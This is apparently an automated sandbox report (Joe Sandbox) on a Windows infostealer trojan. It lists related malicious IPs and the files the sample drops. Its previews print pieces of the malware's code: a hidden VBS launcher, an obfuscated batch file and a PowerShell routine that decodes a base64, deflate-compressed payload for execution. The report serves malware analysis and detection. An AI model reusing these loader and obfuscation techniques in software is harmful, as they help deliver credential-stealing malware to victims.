                                                                                                                                  		39493RU-KSTVKolomnaGroupofcompaniesGuarantee-tvRUtrue

                                                                                                                                  General Information

                                                                                                                                  Joe Sandbox version:40.0.0 Tourmaline
                                                                                                                                  Analysis ID:1431938
                                                                                                                                  Start date and time:2024-04-26 02:41:05 +02:00
                                                                                                                                  Joe Sandbox product:CloudBasic
                                                                                                                                  Overall analysis duration:0h 5m 36s
                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                  Report type:full
                                                                                                                                  Cookbook file name:default.jbs
                                                                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                  Number of analysed new started processes analysed:11
                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                  Number of injected processes analysed:0
                                                                                                                                  Technologies:
                                                                                                                                  • HCA enabled
                                                                                                                                  • EGA enabled
                                                                                                                                  • AMSI enabled
                                                                                                                                  Analysis Mode:default
                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                  Sample name:f6FauZ2CEz.exe
                                                                                                                                  renamed because original name is a hash value
                                                                                                                                  Original Sample Name:1544dbca0efc2c0105dd7d52a21a8891.exe
                                                                                                                                  Detection:MAL
                                                                                                                                  Classification:mal100.troj.spyw.expl.evad.winEXE@13/15@0/1
                                                                                                                                  EGA Information:
                                                                                                                                  • Successful, ratio: 50%
                                                                                                                                  HCA Information:
                                                                                                                                  • Successful, ratio: 96%
                                                                                                                                  • Number of executed functions: 276
                                                                                                                                  • Number of non-executed functions: 45
                                                                                                                                  Cookbook Comments:
                                                                                                                                  • Found application associated with file extension: .exe
                                                                                                                                  • Stop behavior analysis, all processes terminated

                                                                                                                                  Warnings

                                                                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
                                                                                                                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                  • Execution Graph export aborted for target RegAsm.exe, PID 7276 because it is empty
                                                                                                                                  • Execution Graph export aborted for target powershell.exe, PID 1188 because it is empty
                                                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                  • Report size getting too big, too many NtReadVirtualMemory calls found.

                                                                                                                                  Simulations

                                                                                                                                  Behavior and APIs

                                                                                                                                  TimeTypeDescription
                                                                                                                                  02:41:53API Interceptor34x Sleep call for process: powershell.exe modified
                                                                                                                                  02:42:13API Interceptor12x Sleep call for process: RegAsm.exe modified

                                                                                                                                  Joe Sandbox View / Context

                                                                                                                                  IPs

                                                                                                                                  No context

                                                                                                                                  Domains

                                                                                                                                  No context

                                                                                                                                  ASNs

                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                  RU-KSTVKolomnaGroupofcompaniesGuarantee-tvRUfile.exeGet hashmaliciousPureLog Stealer, RisePro Stealer, zgRATBrowse
                                                                                                                                  • 45.15.156.9
                                                                                                                                  file.exeGet hashmaliciousRedLineBrowse
                                                                                                                                  • 5.42.65.96
                                                                                                                                  file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                  • 5.42.66.10
                                                                                                                                  file.exeGet hashmaliciousGlupteba, Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                                                  • 5.42.66.10
                                                                                                                                  file.exeGet hashmaliciousGlupteba, Mars Stealer, PureLog Stealer, Vidar, zgRATBrowse
                                                                                                                                  • 5.42.66.10
                                                                                                                                  file.exeGet hashmaliciousRedLineBrowse
                                                                                                                                  • 5.42.65.96
                                                                                                                                  c3nBx2HQG2.exeGet hashmaliciousGlupteba, Mars Stealer, Phorpiex, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                                                  • 5.42.66.10
                                                                                                                                  file.exeGet hashmaliciousRedLineBrowse
                                                                                                                                  • 5.42.65.96
                                                                                                                                  file.exeGet hashmaliciousRedLineBrowse
                                                                                                                                  • 5.42.65.50
                                                                                                                                  HwJWf67Y5h.exeGet hashmaliciousRedLineBrowse
                                                                                                                                  • 5.42.65.50

                                                                                                                                  JA3 Fingerprints

                                                                                                                                  No context

                                                                                                                                  Dropped Files

                                                                                                                                  No context

                                                                                                                                  Created / dropped Files

                                                                                                                                  C:\Users\Public\Desktop\Google Chrome.lnk

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:41 2023, mtime=Wed Oct 4 11:02:27 2023, atime=Wed Sep 27 04:28:27 2023, length=3242272, window=hide
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):2104
                                                                                                                                  Entropy (8bit):3.4581108461027115
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:48:8SfdqTWSxRYrnvPdAKRkdAGdAKRFdAKR/U:8Sce
                                                                                                                                  MD5:C8DF84C9AE6CEAEDD6A5CF8F0B1D170E
                                                                                                                                  SHA1:2CF37132532775C2FD5C1D768B1FAF582C205DCC
                                                                                                                                  SHA-256:AF2C9B10A04BE4CD801280F033AF7FBB459DE5B1072E349A3F3F165D05215DC5
                                                                                                                                  SHA-512:C108900EE14A363C954354050EADF400CDDFB759D3DB7B120C3202A132A94ACD1FC537D810FC5690C36A578BA8E02B295D60BA889F44FB0A0AB0D072C8A3F8CD
                                                                                                                                  Malicious:false
                                                                                                                                  Reputation:low
                                                                                                                                  Preview:L..................F.@.. ......,..............q.... y1.....................#....P.O. .:i.....+00.../C:\.....................1.....DW.V..PROGRA~1..t......O.IDW5`....B...............J.....i...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VDWN`....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VDWN`....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VDWN`..........................."&.A.p.p.l.i.c.a.t.i.o.n.....`.2. y1.;W.+ .chrome.exe..F......CW.VDWH`..........................,.6.c.h.r.o.m.e...e.x.e.......d...............-.......c............F.......C:\Program Files\Google\Chrome\Application\chrome.exe....A.c.c.e.s.s. .t.h.e. .I.n.t.e.r.n.e.t.;.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.!.-.-.p.r.o.x.y.-.s.e.r.v.e.r

                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegAsm.exe.log

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):3274
                                                                                                                                  Entropy (8bit):5.3318368586986695
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:96:Pq5qHwCYqh3oPtI6eqzxP0aymRLKTqdqlq7qqjqcEZ5D:Pq5qHwCYqh3qtI6eqzxP0at9KTqdqlqY
                                                                                                                                  MD5:0B2E58EF6402AD69025B36C36D16B67F
                                                                                                                                  SHA1:5ECC642327EF5E6A54B7918A4BD7B46A512BF926
                                                                                                                                  SHA-256:4B0FB8EECEAD6C835CED9E06F47D9021C2BCDB196F2D60A96FEE09391752C2D7
                                                                                                                                  SHA-512:1464106CEC5E264F8CEA7B7FF03C887DA5192A976FBC9369FC60A480A7B9DB0ED1956EFCE6FFAD2E40A790BD51FD27BB037256964BC7B4B2DA6D4D5C6B267FA1
                                                                                                                                  Malicious:false
                                                                                                                                  Reputation:moderate, very likely benign file
                                                                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  File Type:data
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):1384
                                                                                                                                  Entropy (8bit):5.395091763144815
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:24:3fWSKco4KmZjKbm51s4RPT6moUebIKo+mZ9tXt/NK3R88bJ0ur89dOR:vWSU4xymI4RfoUeW+mZ9tlNWR83uWOR
                                                                                                                                  MD5:4CBB3158FDB7744A1B86CCBDAC07BC5A
                                                                                                                                  SHA1:193870F27B15DAEEA998B823DF78849FDEF83292
                                                                                                                                  SHA-256:F98D1EFDCE9DAAA88841947310D9D2BF9FB3B25ABDE508AC719983EC8B10F8F7
                                                                                                                                  SHA-512:4505AEE1C52F59D739133818247DBEA251AE625DCF2ED2BF4E375D8B9591550363B6A2566937E93F698A3B53BA0E90FF3AECB1343CA0BBE46595EB23FF465BF5
                                                                                                                                  Malicious:false
                                                                                                                                  Reputation:low
                                                                                                                                  Preview:@...e...........................................................P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.D....................+.H..!...e........System.Configuration.Ins

                                                                                                                                  C:\Users\user\AppData\Local\Temp\Tmp20B6.tmp

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                  File Type:data
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):2662
                                                                                                                                  Entropy (8bit):7.8230547059446645
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:48:qJdHasMPAUha1DgSVVi59ca13MfyKjWwUmq9W2UgniDhiRhkjp9g:bhhEgSVVi59defyfW2sDgAj3g
                                                                                                                                  MD5:1420D30F964EAC2C85B2CCFE968EEBCE
                                                                                                                                  SHA1:BDF9A6876578A3E38079C4F8CF5D6C79687AD750
                                                                                                                                  SHA-256:F3327793E3FD1F3F9A93F58D033ED89CE832443E2695BECA9F2B04ADBA049ED9
                                                                                                                                  SHA-512:6FCB6CE148E1E246D6805502D4914595957061946751656567A5013D96033DD1769A22A87C45821E7542CDE533450E41182CEE898CD2CCF911C91BC4822371A8
                                                                                                                                  Malicious:false
                                                                                                                                  Reputation:moderate, very likely benign file
                                                                                                                                  Preview:0..b...0.."..*.H..............0...0.....*.H..............0...0.....*.H............0...0...*.H.......0...p.,|.(.............mW.....$|Bb.[ .w..#.G.a.K-..i.....+Yo..^m~{........@...iC....[....L.q.J....s?K..G..n.}......;.Q..6..WW..uP.k.F..</..%..*.X.P...V..R......@.Va...Zm....(M3......"..2-..{9......k.3....Y..c]..O.Bq.H.>..p.RS...|B.d..kr.=G.g.v..f.d.C.?..*.0Ch[2:.V....A..7..PD..G....p..*.L{1.&'e..uU)@.i....:.P.;.j.j.......Y.:.a..6.j.L.J.....^[..8,."...2E.......[qU..6.].......nr..i..^l......-..m..u@P;..Ra."......n.p.Z..).:p).F($..|.R.!9V.....[.gV...i..!.....=.y{.T6.9.m..+.....(2..\..V.1..].V...q.%.4.a...n.B..Q..g.~N..s....=iZ...3..).......E..A.I...hH..Q%0.]...u..........h0T.P.X.A............'.....O....Py.=..3..n..c.F.$z..t..jM.E..W...i1..'...Y,r.,.+...o.}.7..kb.t'DQTV..{...#....sT..G...:..3.L.....c..b%z..e.\.EY...M;x.Z....t..nv...@Ka.....|s>.2Qr..f,O..XJ`d....78H8.....`..);.vMcUJ.......m.G5.ib]5.h.v<.?S.{1O.Y...kb.....a&.R......E.l..."J..G.

                                                                                                                                  C:\Users\user\AppData\Local\Temp\Tmp20D7.tmp

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                  File Type:data
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):2662
                                                                                                                                  Entropy (8bit):7.8230547059446645
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:48:qJdHasMPAUha1DgSVVi59ca13MfyKjWwUmq9W2UgniDhiRhkjp9g:bhhEgSVVi59defyfW2sDgAj3g
                                                                                                                                  MD5:1420D30F964EAC2C85B2CCFE968EEBCE
                                                                                                                                  SHA1:BDF9A6876578A3E38079C4F8CF5D6C79687AD750
                                                                                                                                  SHA-256:F3327793E3FD1F3F9A93F58D033ED89CE832443E2695BECA9F2B04ADBA049ED9
                                                                                                                                  SHA-512:6FCB6CE148E1E246D6805502D4914595957061946751656567A5013D96033DD1769A22A87C45821E7542CDE533450E41182CEE898CD2CCF911C91BC4822371A8
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:0..b...0.."..*.H..............0...0.....*.H..............0...0.....*.H............0...0...*.H.......0...p.,|.(.............mW.....$|Bb.[ .w..#.G.a.K-..i.....+Yo..^m~{........@...iC....[....L.q.J....s?K..G..n.}......;.Q..6..WW..uP.k.F..</..%..*.X.P...V..R......@.Va...Zm....(M3......"..2-..{9......k.3....Y..c]..O.Bq.H.>..p.RS...|B.d..kr.=G.g.v..f.d.C.?..*.0Ch[2:.V....A..7..PD..G....p..*.L{1.&'e..uU)@.i....:.P.;.j.j.......Y.:.a..6.j.L.J.....^[..8,."...2E.......[qU..6.].......nr..i..^l......-..m..u@P;..Ra."......n.p.Z..).:p).F($..|.R.!9V.....[.gV...i..!.....=.y{.T6.9.m..+.....(2..\..V.1..].V...q.%.4.a...n.B..Q..g.~N..s....=iZ...3..).......E..A.I...hH..Q%0.]...u..........h0T.P.X.A............'.....O....Py.=..3..n..c.F.$z..t..jM.E..W...i1..'...Y,r.,.+...o.}.7..kb.t'DQTV..{...#....sT..G...:..3.L.....c..b%z..e.\.EY...M;x.Z....t..nv...@Ka.....|s>.2Qr..f,O..XJ`d....78H8.....`..);.vMcUJ.......m.G5.ib]5.h.v<.?S.{1O.Y...kb.....a&.R......E.l..."J..G.

                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ewyjoak1.k2v.psm1

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):60
                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gujfxim1.5mu.psm1

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):60
                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wcqrl52j.rkv.ps1

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):60
                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xul4wa40.4zw.ps1

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):60
                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1002\76b53b3ec448f7ccdda2063b15d2bfc3_9e146be9-c76a-4720-bcdb-53011b87bd06

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                  File Type:data
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):2251
                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3::
                                                                                                                                  MD5:0158FE9CEAD91D1B027B795984737614
                                                                                                                                  SHA1:B41A11F909A7BDF1115088790A5680AC4E23031B
                                                                                                                                  SHA-256:513257326E783A862909A2A0F0941D6FF899C403E104FBD1DBC10443C41D9F9A
                                                                                                                                  SHA-512:C48A55CC7A92CEFCEFE5FB2382CCD8EF651FC8E0885E88A256CD2F5D83B824B7D910F755180B29ECCB54D9361D6AF82F9CC741BD7E6752122949B657DA973676
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                  C:\Users\user\QJHJap.bat

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                  File Type:DOS batch file, ASCII text, with very long lines (41860), with CRLF, LF line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):326634
                                                                                                                                  Entropy (8bit):6.02046937695081
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:6144:hSDgBmX4h5x6Q6cPCGUFn6uXzcKZuzVLyFBnPfWjD/DoEMs:bB5uQ6uiJXzcKZu9MlU/kTs
                                                                                                                                  MD5:36B4C4D03AB02764F2E47E30DBB6C71E
                                                                                                                                  SHA1:E334F09316C3C468EDC1B2002F18AA886324C1FA
                                                                                                                                  SHA-256:C94456D2617C5624A7FEB6C47D0C0AB0F44EFECB3F5B17F38E79AEB915F3D883
                                                                                                                                  SHA-512:BE8B27F19A223B422B0C9BC3EEB775DA5595570988B5D8FEE0856C398AB0BEFCD6C9E86D75483AFBE5F8B938278FCFC9F3EFAC2FD8A25FBF55E213A56C34860B
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:@echo off....setlocal enabledelayedexpansion..set "GOAhpDZonpszAkhZywubLdxcMcqBpeBMJgCgizklWyfKLGQFPR=%userprofile%\QJHJap.ps1"..set HPqLPCrxummxZjOGQuHbQYlifmXNrgmKMxwLvXqZPKfYYyzWVe=%SystemRoot%\SysWow64\WindowsPowerShell\v1.0\powershell.exe..set "LIUFIweVbVclDHhtMvPOrqpqYGTfmgOJRdHuySgMwbrxIstWPJ=%~dp0%~nx0"....set OWkTTXsqBUPpXZPDLTXkQMgYTXAqmaBcpNSRQZusxvxBYSqsXQOWkTTXsqBUPpXZPDLTXkQMgYTXAqmaBcpNSRQZusxvxBYSqsXQ=eYmvoutDGcCZIVgsuzZMVTpdsqZSIFnXqDcQwvPmbUmejxsvqpeYmvoutDGcCZIVgsuzZMVTpdsqZSIFnXqDcQwvPmbUmejxsvqp..set QwYNbJDhGDEDgoaCKCMclSdHmgTnkGNbSnqPMYwNinrNulEQXwQwYNbJDhGDEDgoaCKCMclSdHmgTnkGNbSnqPMYwNinrNulEQXw=eYmvoutDGcCZIVgsuzZMVTpdsqZSIFnXqDcQwvPmbUmejxsvqpeYmvoutDGcCZIVgsuzZMVTpdsqZSIFnXqDcQwvPmbUmejxsvqp-EeYmvoutDGcCZIVgsuzZMVTpdsqZSIFnXqDcQwvPmbUmejxsvqpeYmvoutDGcCZIVgsuzZMVTpdsqZSIFnXqDcQwvPmbUmejxsvqpxeeYmvoutDGcCZIVgsuzZMVTpdsqZSIFnXqDcQwvPmbUmejxsvqpeYmvoutDGcCZIVgsuzZMVTpdsqZSIFnXqDcQwvPmbUmejxsvqpcutieYmvoutDGcCZIVgsuzZMVTpdsqZSIFnXqDcQwvPmbUmejxsvqpeYmvoutDGcCZIV

                                                                                                                                  C:\Users\user\QJHJap.ps1

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (488), with CRLF line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):2781
                                                                                                                                  Entropy (8bit):5.173238868713899
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:48:IJH3AmLXIbs7km/vHhVfB1IPXAQkIKKx7eKcMiXLrszmF6NSNt9E3Hw3f36JT:I5NXtD/LUgzfoNSNjE3+fe
                                                                                                                                  MD5:F8251AA191BB5087D04AA8F873B4B676
                                                                                                                                  SHA1:1DDCF57936BB1D4594C35527857C79D594B8773C
                                                                                                                                  SHA-256:1323E4394630AB1A9A0DC33A74F2B5C53115A4FE2CB94B24C7DEEF2FE6B691C6
                                                                                                                                  SHA-512:0DBE1D657E508B948A58403C0CF943F8BE41B4A8950F6596626DCC795D71BB3839D1C248DC26DF5168AEF8A157BAF4E9D71E45A1FE59C7253AC3C19D78A09D58
                                                                                                                                  Malicious:true
                                                                                                                                  Yara Hits:
                                                                                                                                  • Rule: JoeSecurity_PowershellDecodeAndExecute, Description: Yara detected Powershell decode and execute, Source: C:\Users\user\QJHJap.ps1, Author: Joe Security
                                                                                                                                  Preview:.function DecompressBytes($compressedData) { $ms = [IO.MemoryStream]::new(([System.Convert]::FromBase64String($compressedData))); $ms.Position = 0; $deflateStream = [IO.Compression.DeflateStream]::new($ms, [IO.Compression.CompressionMode]::Decompress); $buffer = [byte[]]::new(4096); $ms = [IO.MemoryStream]::new(); while ($true) { $count = $deflateStream.Read($buffer, 0, $buffer.Length); if ($count -eq 0) { break } $ms.Write($buffer, 0, $count) } $deflateStream.Close(); $ms.ToArray() }....# "The surest way to corrupt a youth is to instruct him to hold in higher esteem those who think alike than those who think differently."..# "In heaven, all the interesting people are missing."..# "He who has a why to live can bear almost any how."..# "To live is to suffer, to survive is to find some meaning in the suffering."..# "Without music, life would be a mistake."......function ReverseString($inputString) {.. $charArray = $inputString.ToCharArray().. $reversedArray = $charArray[-1..-($ch

                                                                                                                                  C:\Users\user\start.vbs

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Users\user\Desktop\f6FauZ2CEz.exe
                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):170
                                                                                                                                  Entropy (8bit):4.938405647464763
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3:jfAEm8nhZFQ1qLZ8ewMxHFXhOwpvlD95RthYSYDAYgPJzphUC:jfANqhZ2wCf8HjOwpND95Jj0AYYdUC
                                                                                                                                  MD5:65EE9F906FDEFCA9B4A6A21581DD849F
                                                                                                                                  SHA1:B372DEA5A9B9A99311445A55B634AA8F6C1D7B9D
                                                                                                                                  SHA-256:087F43E7F9F78BBEB1050CDBFAEB3D23AD7B4B742D6EF91229B8824A20DAAEE6
                                                                                                                                  SHA-512:1F593864F52AC61F7F4EF2AA1BFCF538DD2833E53BBD931F96C42B2CA90D2BF68545FDAC547F0F3CCE09AD7734ACDB629BF642081227A996D3D22117263AD23A
                                                                                                                                  Malicious:true
                                                                                                                                  Preview:Set house = CreateObject("WScript.Shell")..play =house.ExpandEnvironmentStrings("%userprofile%")..ball = play & "\temp.bat"..house.Run ball, 0, False..Set house = Nothing

                                                                                                                                  C:\Users\user\temp.bat

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Users\user\Desktop\f6FauZ2CEz.exe
                                                                                                                                  File Type:DOS batch file, ASCII text, with very long lines (41860), with CRLF, LF line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):326634
                                                                                                                                  Entropy (8bit):6.02046937695081
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:6144:hSDgBmX4h5x6Q6cPCGUFn6uXzcKZuzVLyFBnPfWjD/DoEMs:bB5uQ6uiJXzcKZu9MlU/kTs
                                                                                                                                  MD5:36B4C4D03AB02764F2E47E30DBB6C71E
                                                                                                                                  SHA1:E334F09316C3C468EDC1B2002F18AA886324C1FA
                                                                                                                                  SHA-256:C94456D2617C5624A7FEB6C47D0C0AB0F44EFECB3F5B17F38E79AEB915F3D883
                                                                                                                                  SHA-512:BE8B27F19A223B422B0C9BC3EEB775DA5595570988B5D8FEE0856C398AB0BEFCD6C9E86D75483AFBE5F8B938278FCFC9F3EFAC2FD8A25FBF55E213A56C34860B
                                                                                                                                  Malicious:true
